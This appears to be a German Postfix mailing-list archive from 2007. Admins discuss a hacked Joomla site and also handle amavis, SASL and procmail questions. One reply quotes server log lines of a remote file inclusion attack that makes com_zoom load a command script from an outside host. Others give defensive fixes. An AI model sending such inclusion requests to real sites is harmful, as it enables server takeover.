nfig_absolute_path=http://snob.no-ip.info/cmd?&chdir=/var/www/web396/html/bavaria/bavaria/ components/com_zoom/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9" 201.19.118.75 - - [27/Nov/2007:19:39:26 +0100] "POST /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://snob.n o-ip.info/cmd?&action=upload&chdir=/var/www/web396/html/bavaria/bavaria/components/com_zoo m/ HTTP/1.1" 200 32656 "http://www.bavaria-ebernburg.de/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosCo nfig_absolute_path=http://snob.no-ip.info/cmd?&chdir=/var/www/web396/html/bavaria/bavaria/ components/com_zoom/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9" Hier steht Sie wieder zur Verfügung 201.15.253.165 - - [27/Nov/2007:19:39:30 +0100] "GET /components/com_zoom/link.php HTTP/1.1" 200 120027 "http://webmail.vidyayoga.org/cgi-bin/webmail/webmail-read.pl?acao=readmessage&folder=inbo x&firstmessage=1&sessionid=TwvOBPV1v1Bsz94KKXolo1om25I0BIaM&sort=date&headers=normal&messa ge_id=cur/1196167307.10653.hm191,S=3415" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; pt-pt) AppleWebKit/417.10 (KHTML, like Gecko) Safari/417.9" Ich hoffe mal das mein Server mit PHP 5.2.3-1+lenny1 (cli) (built: Oct 3 2007 19:22:40) Copyright (c) 1997-2007 The PHP Group Zend Engine v2.2.0, Copyright (c) 1998-2007 Zend Technologies Erstmal sicher ist konnte bis dato in den eigenen Logs auch noch keine Aufrufe dieser Art finden. Noch jemand Tips damit es gar nicht erst passiert? Der die Seite geschrieben bzw. eingerichtet hat ist verständigt um evtl. Updates einzuspielen. > > Gruß Sven > Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From driessen at fblan.de Wed Nov 28 15:28:07 2007 From: driessen at fblan.de (Uwe Driessen) Date: Wed, 28 Nov 2007 15:28:07 +0100 Subject: [Postfixbuch-users] OT Site gehackt In-Reply-To: <474D750C.2060007@linuxrocks.dyndns.org> References: <000f01c831c4$0cc50a50$0565a8c0@uwe> <474D750C.2060007@linuxrocks.dyndns.org> Message-ID: <001401c831ca$e5315730$0565a8c0@uwe> Matthias Haegele schrieb: > Steht der (gecrackte) Server unter deiner Kontrolle? Nö leider nicht dann wäre das sehr wahrscheinlich schneller aufgefallen > Nach einem Befall ist es das wichtigste "Beweissicherung" anzugehen, je > schneller desto besser, jo logs sind noch da siehe Mail vorher > je weniger Zeit hat der Angreifer seine Spuren zu beseitigen. Wichtig > wäre es natürlich festzustellen wie der Angreifer Zugriff auf das System > bekam (PHP-Lücke, Kernel, etc ...). Damit nicht hernach wieder über > selbige (ungepatchte) das System nochmals gekapert werden kann. Ob er > Root-Zugriff bekam oder "nur" die "Webseite verunglimpfen" konnte. Kann ich so nicht sagen aber es schaut eher danach aus das dieser Server einer dringenden Wartung bedarf > > (In diesem Zusammenhang kann man auch auf offene Ports zu IRC-Bots etc. > ein Auge werfen). s.o. > > "Online-Analyse" bzw. "Offline-Analyse", bei ersterem wird versucht im > Laufenden System Hinweise zu finden, bei letzterem wird versucht das > System, kommt natürlich auch darauf an wie verfügbar der Server ist, ob > man sich "downtime" leisten kann ... s.o. > > btw: Es ist besser den Server "hart" über den "Poweroff-Knopf, nicht das > Kommando" auszuschalten, als etwa zu riskieren dass beim Herunterfahren > irgendwelche Skripte, etc. Spuren beseitigen. s.o. nicht meiner ich ziehe eh so nach und nach alle Seiten auf den eigenen Server da bin ich flexibler und kann schneller reagieren. > > Evtl. hilft die Helix Live CD (statisch gelinkte Programme usw.) zur > Beweissicherung > > http://www.e-fense.com/helix/contents.php Hab ich schon von gehört und gelesen auf meinem Server hab ich zur Zeit das logfile auf dem 2. Bildschirm mitlaufen Diese Art der injection schient zumindest auf Windoof Rechner bekannt zu sein http://www.threatexpert.com/report.aspx?uid=c6d81498-74d2-4baf-a1e3-f5b2ccd2490e > > Unter Umständen sollte man in so einem Fall einen Experten hinzuziehen, > man vernichtet leicht Beweise ... Das interessiert mich nur am Rande da es nicht mein Server ist (hat schon seinen Grund warum ich alle Domains dort runterziehe) > (Persönlich würde ich mir es nicht zutrauen das richtig durchzuführen > (Vor Gericht verwertbar mit md5sums usw. ...)). > > Hoffe mein Halbwissen hilft etwas ;-). Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From crandler at crandland.de Wed Nov 28 15:33:06 2007 From: crandler at crandland.de (crandler) Date: Wed, 28 Nov 2007 15:33:06 +0100 Subject: [Postfixbuch-users] OT Site gehackt In-Reply-To: <001201c831c8$9fb1a9a0$0565a8c0@uwe> Message-ID: <014101c831cb$9808e120$2200a8c0@netclusive.local> > In den Logs habe ich folgendes gefunden > ...EXIF_Makernote.php?mosConfig_absolute_path=http://... Klassisches Beispiel von Code Injection mittel url_fopen. Ganz kurz gesagt: Das Script "includiert" den Inhalt der URL ohne Prüfung auf Sinn und Unsinn bzw. Sicherheit und Unsicherheit. :) > Ich hoffe mal das mein Server mit > PHP 5.2.3-1+lenny1 (cli) (built: Oct 3 2007 19:22:40) > Copyright (c) 1997-2007 The PHP Group > Zend Engine v2.2.0, Copyright (c) 1998-2007 Zend Technologies > > Erstmal sicher ist konnte bis dato in den eigenen Logs auch noch keine > Aufrufe dieser Art finden. Evtl. mal sicherheitshalber rkhunter und/oder chkrootkit drüber laufen lassen. Kenne deinen Server nicht. :) Läuft PHP als Modul oder CGI? > Noch jemand Tips damit es gar nicht erst passiert? - Software aktuell halten, Löcher regelmäßig "stopfen" - Kunden zu mehr Vorsorge drängen, denn Vorsicht ist besser als... (kennst du ja sicher) - mod_security verwenden - allow_url_fopen deaktivieren (könnte bei manchen Skripten Probleme bereiten) > Der die Seite geschrieben bzw. eingerichtet hat ist verständigt um evtl. > Updates einzuspielen. Das muss er wohl. :) From driessen at fblan.de Wed Nov 28 15:44:03 2007 From: driessen at fblan.de (Uwe Driessen) Date: Wed, 28 Nov 2007 15:44:03 +0100 Subject: [Postfixbuch-users] OT Site gehackt In-Reply-To: <014101c831cb$9808e120$2200a8c0@netclusive.local> References: <001201c831c8$9fb1a9a0$0565a8c0@uwe> <014101c831cb$9808e120$2200a8c0@netclusive.local> Message-ID: <001501c831cd$1edaeda0$0565a8c0@uwe> Crandler schrieb: > > In den Logs habe ich folgendes gefunden > > ...EXIF_Makernote.php?mosConfig_absolute_path=http://... > > Klassisches Beispiel von Code Injection mittel url_fopen. > > Ganz kurz gesagt: > Das Script "includiert" den Inhalt der URL ohne Prüfung auf Sinn und Unsinn > bzw. Sicherheit und Unsicherheit. :) Gut zu wissen > > > > Ich hoffe mal das mein Server mit > > PHP 5.2.3-1+lenny1 (cli) (built: Oct 3 2007 19:22:40) > > Copyright (c) 1997-2007 The PHP Group > > Zend Engine v2.2.0, Copyright (c) 1998-2007 Zend Technologies > > > > Erstmal sicher ist konnte bis dato in den eigenen Logs auch noch keine > > Aufrufe dieser Art finden. > > Evtl. mal sicherheitshalber rkhunter und/oder chkrootkit drüber laufen > lassen. Kenne deinen Server nicht. :) > Läuft PHP als Modul oder CGI? Php als modul Rkhunter als auch chrootkit rennen 2 mal am Tag (ein bisschen paranoid hat noch nie geschadet *gg) > > > > Noch jemand Tips damit es gar nicht erst passiert? > > - Software aktuell halten, Löcher regelmäßig "stopfen" Ist selbstverständlich, wird fast täglich gemacht > > - Kunden zu mehr Vorsorge drängen, denn Vorsicht ist besser als... (kennst > > du ja sicher) > > - mod_security verwenden Rennt ebenfalls > > - allow_url_fopen deaktivieren (könnte bei manchen Skripten Probleme > bereiten) Muß ich mal testen > > > > Der die Seite geschrieben bzw. eingerichtet hat ist verständigt um evtl. > > Updates einzuspielen. > > Das muss er wohl. :) > Er ist schon dranne *gg Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From theofel at etes.de Wed Nov 28 15:11:47 2007 From: theofel at etes.de (Jan Theofel) Date: Wed, 28 Nov 2007 15:11:47 +0100 Subject: [Postfixbuch-users] OT Site gehackt In-Reply-To: <000f01c831c4$0cc50a50$0565a8c0@uwe> References: <000f01c831c4$0cc50a50$0565a8c0@uwe> Message-ID: <20071128141147.GA13197@intranet.hq.stgt.etes.de> Hallo zusammen, On Wed, Nov 28, 2007 at 02:39:07PM +0100, Uwe Driessen wrote: > > Bin zur Zeit auf der Spur eines Hacks der eine von mir betreute Seite befallen hat. > Es wurde wie auch immer eine link.php in ein Unterverzeichnis eingeschleust. Wir hatten bei einem Kunden neulich mal eine Aenderung an der Homepage, bei der durch ein iframe ein Schadecode dazugeladen wurde. Das war gar kein Angriff auf den Server sondern "nur" ein Trojaner, dier intelligent genug ist FTP-Verbindungen auf befallenen Clients zu suchen. Und da die Seite von einer Papier-haben-wir-noch-verstanden-Werbeagentur gebaut wurde kann man sich vorstellen, wo der FTP-Zugang abgegriffen wurde... Jan -- Jan Theofel Web: http://www.etes.de E-Mail: theofel at etes.de ETES GmbH Libanonstrasse 58 A D-70184 Stuttgart Fon: +49 (7 11) 48 90 83 - 0 Fax: +49 (7 11) 48 90 83 - 50 Registergericht: Amtsgericht Stuttgart HRB 721182 Geschäftsführende Gesellschafter: Markus Espenhain und Jan Theofel Sitz der Gesellschaft: Stuttgart USt.-Id.Nr.: DE814767446 From mailinglists at matthias-balke.de Wed Nov 28 17:29:48 2007 From: mailinglists at matthias-balke.de (Matthias Balke) Date: Wed, 28 Nov 2007 17:29:48 +0100 Subject: [Postfixbuch-users] Filterzeichen in Mailadressen In-Reply-To: <002401c8313e$4cc2b020$0565a8c0@uwe> References: <001d01c83114$608b2da0$0565a8c0@uwe> <63908DA348933441A6FB2AB998ED894F065E03@dcex01.2nibbles4u.local> <002401c8313e$4cc2b020$0565a8c0@uwe> Message-ID: > Aber scheinbar sind wir die einzigen bis dato die das bemerkt haben. > Evtl. auch nur ein schlecht programmierter Wurm oder sonst was. > > Hallo Christian, nein ich habe in den letzten Tagen auch meine Logs voll mit diesen Mails. Mein Postfix weißt sie immer mit der Begründung ab: "We do not support sendmail hacking tricks here." Es sind zwar keine Befehle in den Namen versteckt oder so etwas aber wundern tut's mich auch. Falls also jemand weiß was das ist, melde er sich doch bitte eben hier auf der Liste. Matthias From ch.grau at gmx.de Wed Nov 28 17:26:01 2007 From: ch.grau at gmx.de (Christian Grau) Date: Wed, 28 Nov 2007 17:26:01 +0100 Subject: [Postfixbuch-users] zip und exe dateien in e-mail zulassen Message-ID: <20071128162601.148980@gmx.net> hallo liste, ich habe das problem, dass ich keine zip oder exe files versenden bzw empfangen kann. mein amavisd filtert diese heraus. was muss ich einstellen in der amavisd.conf, damit er diese nicht mehr als "banned" markiert. hier mal ein bsp. aus der benachrichtigungsmail: Banned name: multipart/mixed | application/x-zip-mpressed,.zip,KOMSTAT.zip |.exe,.exe-ms,callKOMSTAT.exe vielen dank christian grau -- Der GMX SmartSurfer hilft bis zu 70% Ihrer Onlinekosten zu sparen! Ideal für Modem und ISDN: http://www.gmx.net/de/go/smartsurfer From mailinglists at matthias-balke.de Wed Nov 28 17:56:17 2007 From: mailinglists at matthias-balke.de (Matthias Balke) Date: Wed, 28 Nov 2007 17:56:17 +0100 Subject: [Postfixbuch-users] zip und exe dateien in e-mail zulassen In-Reply-To: <20071128162601.148980@gmx.net> References: <20071128162601.148980@gmx.net> Message-ID: <9D3A50FC-F3D6-479E-BF11-1212B01D1B7C@matthias-balke.de> > > ich habe das problem, dass ich keine zip oder exe files versenden > bzw empfangen kann. > mein amavisd filtert diese heraus. > was muss ich einstellen in der amavisd.conf, damit er diese nicht > mehr als "banned" markiert. > Hallo, bei mir (Debian) steht das in der Datei: /etc/amavis/conf.d/20-debian_defaults Ich habe dir mal nen Auszug angehängt, danach kannste ja einfach ma in deiner amavis.conf greppen: /etc/amavis/conf.d# cat 20-debian_defaults | grep exe qr'\.[^./]*\.(exe|vbs|pif|scr|bat|cmd|com|cpl|dll)\.?$'i, qr'.\.(exe|vbs|pif|scr|bat|cmd|com|cpl)$'i, # banned extension - basic # qr'.\.(ade|adp|app|bas|bat|chm|cmd|com|cpl|crt|emf|exe|fxp|grp|hlp| hta| qr'^\.(exe-ms)$', # banned file(1) types # qr'^\.(exe|lha|tnef|cab|dll)$', # banned file(1) types In meinem Fall müsstest du die Zeile: qr'^\.(exe-ms)$', # banned file(1) types auskommentieren. Matthias From postfixbuch-users at japantest.homelinux.com Wed Nov 28 18:07:10 2007 From: postfixbuch-users at japantest.homelinux.com (Sandy Drobic) Date: Wed, 28 Nov 2007 18:07:10 +0100 Subject: [Postfixbuch-users] =?utf-8?q?Procmail_und_virtuelle_Postf=C3=A4c?= =?utf-8?q?her?= In-Reply-To: <474D6DBF.2030201@root2.schroederhost.de> References: <474D6DBF.2030201@root2.schroederhost.de> Message-ID: <474DA03E.607@japantest.homelinux.com> Sven Schmidt wrote: > Hallo! > > Ich versuche mit Procmail Spammails in einen Lernbox zu kopieren. > > PATH=/bin:/usr/bin > LOGFILE=/var/log/procmail-v.log > VERBOSE=off > > :0 c > * ^X-Spam-Level: \*\* > /var/mail/spamfach > > Leider sieht procmail nur Mails für locale User. > > > Main.cf > mailbox_command = /usr/bin/procmail -a "$EXTENSION" > > Geht das vielleicht gar nicht mit Procmail? Doch, aber du musst für diese Adresse eben den Transport procmail oder local angeben, sonst wird der Standard-Transport für die Domainklasse verwendet. Mailbox_command wird nur von dem Transport local verwendet, der wiederum nur für Domains in $mydestination per Default verwendet wird. -- Sandy Antworten bitte nur in die Mailingliste! PMs bitte an: news-reply2 (@) japantest (.) homelinux (.) com From driessen at fblan.de Wed Nov 28 18:15:53 2007 From: driessen at fblan.de (Uwe Driessen) Date: Wed, 28 Nov 2007 18:15:53 +0100 Subject: [Postfixbuch-users] zip und exe dateien in e-mail zulassen In-Reply-To: <9D3A50FC-F3D6-479E-BF11-1212B01D1B7C@matthias-balke.de> References: <20071128162601.148980@gmx.net> <9D3A50FC-F3D6-479E-BF11-1212B01D1B7C@matthias-balke.de> Message-ID: <001901c831e2$54e73e70$0565a8c0@uwe> Matthias Balke schrieb: > > > > ich habe das problem, dass ich keine zip oder exe files versenden > > bzw empfangen kann. > > mein amavisd filtert diese heraus. > > was muss ich einstellen in der amavisd.conf, damit er diese nicht > > mehr als "banned" markiert. > > > > Hallo, > > bei mir (Debian) steht das in der Datei: > /etc/amavis/conf.d/20-debian_defaults > > Ich habe dir mal nen Auszug angehängt, danach kannste ja einfach ma > in deiner amavis.conf greppen: > > /etc/amavis/conf.d# cat 20-debian_defaults | grep exe > qr'\.[^./]*\.(exe|vbs|pif|scr|bat|cmd|com|cpl|dll)\.?$'i, > qr'.\.(exe|vbs|pif|scr|bat|cmd|com|cpl)$'i, # banned extension - > basic > # qr'.\.(ade|adp|app|bas|bat|chm|cmd|com|cpl|crt|emf|exe|fxp|grp|hlp| > hta| > qr'^\.(exe-ms)$', # banned file(1) types > # qr'^\.(exe|lha|tnef|cab|dll)$', # banned file(1) types > > In meinem Fall müsstest du die Zeile: > qr'^\.(exe-ms)$', # banned file(1) types > > auskommentieren. > > > > Matthias > -- In der Regel sollte man zip mit exe in einem eigenen Bereich auf der HP bereitstellen und nur den downloadlink versenden. Bei 0 Tagen Vorwarnzeit bzw. in der Zwischenzeit sind Trojaner und Viren in einer Stunde um den Erdball lasse ich hier auch keinen solchen Versand zu. Weder eingehend noch ausgehend. Jede ausführbare Datei auch im Anhang und gezipt stellt ein Sicherheitsrisiko dar. Und bevor jetzt wieder kommt bei möchte ich nicht Kunde sein die Firmen und Vereine haben dieses Sicherheitsfeature begrüßt und akzeptiert (ich habe zwar vorher immer so um die 50 - 200 ? mit den verseuchten Rechnern verdient aber was soll's). Man nudelt dann auch nicht das Doppelte der Datei an Größe, wegen der Codierung ins Mailformat, durchs Netz. Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From lx at survive-linux.com Wed Nov 28 18:25:54 2007 From: lx at survive-linux.com (=?UTF-8?B?QWxleGFuZGVyIErDpMKKZ2Vy?=) Date: Wed, 28 Nov 2007 18:25:54 +0100 Subject: [Postfixbuch-users] OT Site gehackt In-Reply-To: <001501c831cd$1edaeda0$0565a8c0@uwe> References: <001201c831c8$9fb1a9a0$0565a8c0@uwe> <014101c831cb$9808e120$2200a8c0@netclusive.local> <001501c831cd$1edaeda0$0565a8c0@uwe> Message-ID: <474DA4A2.70709@survive-linux.com> Uwe Driessen schrieb: > Crandler schrieb: > >>> In den Logs habe ich folgendes gefunden >>> ...EXIF_Makernote.php?mosConfig_absolute_path=http://... >>> >> Klassisches Beispiel von Code Injection mittel url_fopen. >> >> Ganz kurz gesagt: >> Das Script "includiert" den Inhalt der URL ohne Prüfung auf Sinn und Unsinn >> bzw. Sicherheit und Unsicherheit. :) >> > > Gut zu wissen > > >> >>> Ich hoffe mal das mein Server mit >>> PHP 5.2.3-1+lenny1 (cli) (built: Oct 3 2007 19:22:40) >>> Copyright (c) 1997-2007 The PHP Group >>> Zend Engine v2.2.0, Copyright (c) 1998-2007 Zend Technologies >>> >>> Erstmal sicher ist konnte bis dato in den eigenen Logs auch noch keine >>> Aufrufe dieser Art finden. >>> >> Evtl. mal sicherheitshalber rkhunter und/oder chkrootkit drüber laufen >> lassen. Kenne deinen Server nicht. :) >> Läuft PHP als Modul oder CGI? >> > > Php als modul > Rkhunter als auch chrootkit rennen 2 mal am Tag (ein bisschen paranoid hat noch nie > geschadet *gg) > > >> >>> Noch jemand Tips damit es gar nicht erst passiert? >>> >> - Software aktuell halten, Löcher regelmäßig "stopfen" >> > > Ist selbstverständlich, wird fast täglich gemacht > > >> - Kunden zu mehr Vorsorge drängen, denn Vorsicht ist besser als... (kennst >> >> du ja sicher) >> >> - mod_security verwenden >> > > Rennt ebenfalls > > >> - allow_url_fopen deaktivieren (könnte bei manchen Skripten Probleme >> bereiten) >> > > Muß ich mal testen > > >> >>> Der die Seite geschrieben bzw. eingerichtet hat ist verständigt um evtl. >>> Updates einzuspielen. >>> >> Das muss er wohl. :) >> >> > Er ist schon dranne *gg > > Mit freundlichen Grüßen > > Drießen > > Was sich in der Vergangenheit als ganz praktisch erwiesen hat ist partitionen auf denen webhosts laufen mit noexec und nosuid zu mounten, ausser dem das Standard uploadverzeichniss von PHP auch auf die Partitionen schmeissen, so können keine Shell Skripte ausführbar geschmuggelt werden.... Grüße, Alex From postfixbuch-users at japantest.homelinux.com Wed Nov 28 19:57:44 2007 From: postfixbuch-users at japantest.homelinux.com (Sandy Drobic) Date: Wed, 28 Nov 2007 19:57:44 +0100 Subject: [Postfixbuch-users] Speicherverbrauch POP/IMAP-Sitzung bei Courier/ Mails in Amavis/Postfix In-Reply-To: <20071128081857.GB8464@charite.de> References: <474D177C.7070305@thomas-schwenski.de> <20071128081857.GB8464@charite.de> Message-ID: <474DBA28.2090301@japantest.homelinux.com> Ralf Hildebrandt wrote: > * Thomas Schwenski : >> Hallo, >> >> da Peer vor kurzem hier mit der Aussage zitiert wurde eine Courier >> IMAP-Sitzung würde permanent (solange offen) 1MB Arbeitsspeicher >> verbraten, wollte ich mal nachfragen, wie man dies ermitteln/belegen kann. >> >> Ich brauche für eine Dokumentation leider einen für einen außenstehenden >> glaubhaften Messwert/Nachweis. >> Also wie kann ich das messen? > > ps? top? Nö, wegen Shared Memory nicht aussagekräftig. Ende August dieses Jahres kam das Thema auch schon einmal auf in bezug auf den smtpd, und wieviele man davon gleichzeitig laden kann. Ich hatte das letztes Jahr auch einmal auf der postfix-users Liste gefragt und den Hinweis auf pmap und Shared Memory bekommen. Du hattest das Ergebnis der Diskussion dann auf deiner Seite gepostet. Hier zur Erinnerung: (^-^) http://www.arschkrebs.de/postfix/postfix_memory.shtml -- Sandy Antworten bitte nur in die Mailingliste! PMs bitte an: news-reply2 (@) japantest (.) homelinux (.) com From lists at puersten.de Wed Nov 28 20:11:19 2007 From: lists at puersten.de (=?ISO-8859-15?Q?Oliver_P=FCrsten?=) Date: Wed, 28 Nov 2007 20:11:19 +0100 Subject: [Postfixbuch-users] SASL mit auxprop und MySQL Backend Message-ID: <474DBD57.5000203@puersten.de> Hallo Leute, ich versuche eine SASL Authentifizierung gegen eine MySQL Datenbank zu bauen und habe das Problem das die Authentifizierung nicht funktioniert. Ich habe schon so ziehmlich alles probiert, es will aber einfach nicht. Vielleicht fällt Euch ja noch was ein. Folgende Hintergrundinfo's: Ich habe mittlerweile schon eine einfache db Tabelle erstellt welche nur username und password enthält, hier die zur Authentifizierung genutzte smtpd.conf: pwcheck_method: auxprop auxprop_plugin: sql mech_list: PLAIN LOGIN CRAM-MD5 DIGEST-MD5 sql_engine: mysql sql_hostnames: 127.0.0.1 sql_user: mail sql_passwd: mail sql_database: mail sql_select: SELECT password FROM sasl WHERE username = '%u' Ich teste mit den SASL Tools client und server, was folgendes Ergebnis bei einer Probesession bringt: #./client -s rcmd -p 8000 -m PLAIN 127.0.0.1 receiving capability list... recv: {57} NTLM LOGIN ANONYMOUS PLAIN GSSAPI OTP DIGEST-MD5 CRAM-MD5 NTLM LOGIN ANONYMOUS PLAIN GSSAPI OTP DIGEST-MD5 CRAM-MD5 please enter an authentication id: test1 at test.de please enter an authorization id: test1 at test.de Password: send: {5} PLAIN send: {1} Y send: {32} test1 at test.de[0]test1 at test.de[0]test authentication failed closing connection #./server -s rcmd -p 8000 trying 28, 1, 6 trying 2, 1, 6 accepted new connection send: {57} NTLM LOGIN ANONYMOUS PLAIN GSSAPI OTP DIGEST-MD5 CRAM-MD5 recv: {5} PLAIN recv: {1} Y recv: {32} test1 at test.de[0]test1 at test.de[0]test starting SASL negotiation: user not foundclosing connection Direkter sql in der Datenbank funktioniert ebenfalls: mysql> select password from sasl where username='test1 at test.de'; +----------+ | password | +----------+ | test | +----------+ 1 row in set (0.00 sec) mysql> Besten Dank ! Gruß Oliver From postfixbuch-users at japantest.homelinux.com Wed Nov 28 20:14:23 2007 From: postfixbuch-users at japantest.homelinux.com (Sandy Drobic) Date: Wed, 28 Nov 2007 20:14:23 +0100 Subject: [Postfixbuch-users] Speicherverbrauch POP/IMAP-Sitzung bei Courier/ Mails in Amavis/Postfix In-Reply-To: <20071128121208.62c229ca@gamma.meyer.home> References: <474D177C.7070305@thomas-schwenski.de> <20071128121208.62c229ca@gamma.meyer.home> Message-ID: <474DBE0F.9010808@japantest.homelinux.com> Andreas Meyer wrote: > Thomas Schwenski schrieb: > >> Hallo, >> >> da Peer vor kurzem hier mit der Aussage zitiert wurde eine Courier >> IMAP-Sitzung würde permanent (solange offen) 1MB Arbeitsspeicher >> verbraten, wollte ich mal nachfragen, wie man dies ermitteln/belegen kann. >> >> Ich brauche für eine Dokumentation leider einen für einen außenstehenden >> glaubhaften Messwert/Nachweis. >> Also wie kann ich das messen? >> (Oder ist der Verbrauch irgendwo dokumentiert.) >> >> Dasselbe gilt für den Amavisd-New- (mit SpamAssassin & ClamAV) und >> Postfix-Verbrauch pro Mail >> Wie lässt der sich ermitteln/berechnen? > > Vielleicht ist das nachfolgende perl-script was für Dich: > > #!/usr/bin/perl -w > # by Kristian K.hntopp > # made more robust by David Haller > # > # USAGE: memuse.pl PID Das werde ich mir mal in einer ruhigen Minute zu Gemüte führen. Ich glaube aber, das diese Script etwas völlig anderes misst: ./memuse.pl 28037 [28037] smtpd -n smtp -t inet -u -o smtpd_proxy_filter 127.0.0.1:10024 -o smtpd_client_connection_count_limit 4 -o receive_override_options no_address_mappings share = 6230016 ( 5.94 MB) private = 3342336 ( 3.19 MB) total = 9572352 ( 9.13 MB) ( 65.08 % shareable) pmap 28037 [....] b7f2c000 8K 8K 8K rw-p /lib/ld-2.6.1.so bfe25000 84K 32K 32K rw-p [stack] ffffe000 4K 0K 0K r-xp [vdso] Total: 9348K 5524K 2948K 3260K writable-private, 5452K readonly-private, 636K shared, and 5524K referenced pmap 28037| egrep '(smtpd|stack)' 28037: smtpd 80000000 136K 96K 0K r-xp /usr/lib/postfix/smtpd 80022000 12K 12K 12K rw-p /usr/lib/postfix/smtpd bfe25000 84K 32K 32K rw-p [stack] Das memuse.pl nimmt also den Verbrauch von sämtlichen gelinkten Libraries, die referenziert werden, ebenfalls mit auf. Ganz einfach scheint es nicht zu sein, den Speicherverbrauch von Postfix präzise zu berechnen. -- Sandy Antworten bitte nur in die Mailingliste! PMs bitte an: news-reply2 (@) japantest (.) homelinux (.) com From jk at jkart.de Wed Nov 28 20:17:53 2007 From: jk at jkart.de (Jim Knuth) Date: Wed, 28 Nov 2007 20:17:53 +0100 Subject: [Postfixbuch-users] (OT) ERROR: Malformed database Message-ID: <474DBEE1.9070204@jkart.de> Hallo, ich bekomme sporadisch von Cron folgendes beim Update von SaneSecurity: --snip LibClamAV Error: Problem parsing database at line 1 LibClamAV Error: Can't load /var/tmp/clamdb/scam.ndb: Malformed database ERROR: Malformed database LibClamAV Error: Problem parsing database at line 1 LibClamAV Error: Can't load /var/tmp/clamdb/phish.ndb: Malformed database ERROR: Malformed database --snap Wenn ich dann auf die Console gehe und den Befehl händisch "loslasse" ist aber alles in Ordnung. Wie kommt es zu diesem "Fehler"? Ansonsten einfach ignorieren, oder? -- mit freundlichem Gruss - with kind regard Jim Knuth #ICQ 277289867 From p at state-of-mind.de Wed Nov 28 20:25:11 2007 From: p at state-of-mind.de (Patrick Ben Koetter) Date: Wed, 28 Nov 2007 20:25:11 +0100 Subject: [Postfixbuch-users] SASL mit auxprop und MySQL Backend In-Reply-To: <474DBD57.5000203@puersten.de> References: <474DBD57.5000203@puersten.de> Message-ID: <20071128192511.GC27397@state-of-mind.de> * Oliver Pürsten : > Hallo Leute, > > ich versuche eine SASL Authentifizierung gegen eine MySQL Datenbank zu bauen und habe das > Problem das die Authentifizierung nicht funktioniert. Ich habe schon so ziehmlich alles > probiert, es will aber einfach nicht. > > Vielleicht fällt Euch ja noch was ein. > > Folgende Hintergrundinfo's: > > Ich habe mittlerweile schon eine einfache db Tabelle erstellt welche nur username und > password enthält, hier die zur Authentifizierung genutzte smtpd.conf: > > pwcheck_method: auxprop > auxprop_plugin: sql > mech_list: PLAIN LOGIN CRAM-MD5 DIGEST-MD5 > sql_engine: mysql > sql_hostnames: 127.0.0.1 > sql_user: mail > sql_passwd: mail > sql_database: mail > sql_select: SELECT password FROM sasl WHERE username = '%u' > > Ich teste mit den SASL Tools client und server, was folgendes Ergebnis bei einer > Probesession bringt: Hast Du dafür eine sample.conf angelegt? Wenn ja, wo liegt die? p at rick > > > #./client -s rcmd -p 8000 -m PLAIN 127.0.0.1 > receiving capability list... recv: {57} > NTLM LOGIN ANONYMOUS PLAIN GSSAPI OTP DIGEST-MD5 CRAM-MD5 > NTLM LOGIN ANONYMOUS PLAIN GSSAPI OTP DIGEST-MD5 CRAM-MD5 > please enter an authentication id: test1 at test.de > please enter an authorization id: test1 at test.de > Password: > send: {5} > PLAIN > send: {1} > Y > send: {32} > test1 at test.de[0]test1 at test.de[0]test > authentication failed > closing connection > > #./server -s rcmd -p 8000 > trying 28, 1, 6 > trying 2, 1, 6 > accepted new connection > send: {57} > NTLM LOGIN ANONYMOUS PLAIN GSSAPI OTP DIGEST-MD5 CRAM-MD5 > recv: {5} > PLAIN > recv: {1} > Y > recv: {32} > test1 at test.de[0]test1 at test.de[0]test > starting SASL negotiation: user not foundclosing connection > > Direkter sql in der Datenbank funktioniert ebenfalls: > > mysql> select password from sasl where username='test1 at test.de'; > +----------+ > | password | > +----------+ > | test | > +----------+ > 1 row in set (0.00 sec) > > mysql> > > > Besten Dank ! > > Gruß Oliver > -- > _______________________________________________ > Postfixbuch-users -- http://www.postfixbuch.de > Heinlein Professional Linux Support GmbH > > Postfixbuch-users at listi.jpberlin.de > https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users -- Postfix - Einrichtung, Betrieb und Wartung saslfinger (debugging SMTP AUTH): From postfixbuch-users at japantest.homelinux.com Wed Nov 28 20:56:20 2007 From: postfixbuch-users at japantest.homelinux.com (Sandy Drobic) Date: Wed, 28 Nov 2007 20:56:20 +0100 Subject: [Postfixbuch-users] SASL mit auxprop und MySQL Backend In-Reply-To: <474DBD57.5000203@puersten.de> References: <474DBD57.5000203@puersten.de> Message-ID: <474DC7E4.8060300@japantest.homelinux.com> Oliver Pürsten wrote: > Hallo Leute, > > ich versuche eine SASL Authentifizierung gegen eine MySQL Datenbank zu bauen und habe das > Problem das die Authentifizierung nicht funktioniert. Ich habe schon so ziehmlich alles > probiert, es will aber einfach nicht. > > Vielleicht fällt Euch ja noch was ein. > > Folgende Hintergrundinfo's: > > Ich habe mittlerweile schon eine einfache db Tabelle erstellt welche nur username und > password enthält, hier die zur Authentifizierung genutzte smtpd.conf: > > pwcheck_method: auxprop > auxprop_plugin: sql > mech_list: PLAIN LOGIN CRAM-MD5 DIGEST-MD5 > sql_engine: mysql > sql_hostnames: 127.0.0.1 > sql_user: mail > sql_passwd: mail > sql_database: mail > sql_select: SELECT password FROM sasl WHERE username = '%u' %u ist nur der username bzw. der localpart. Wenn du eine komplette Emailadresse verwenden willst, nimm %s. Wie sind die Usernamen angelegt? > recv: {32} > test1 at test.de[0]test1 at test.de[0]test > starting SASL negotiation: user not foundclosing connection > > Direkter sql in der Datenbank funktioniert 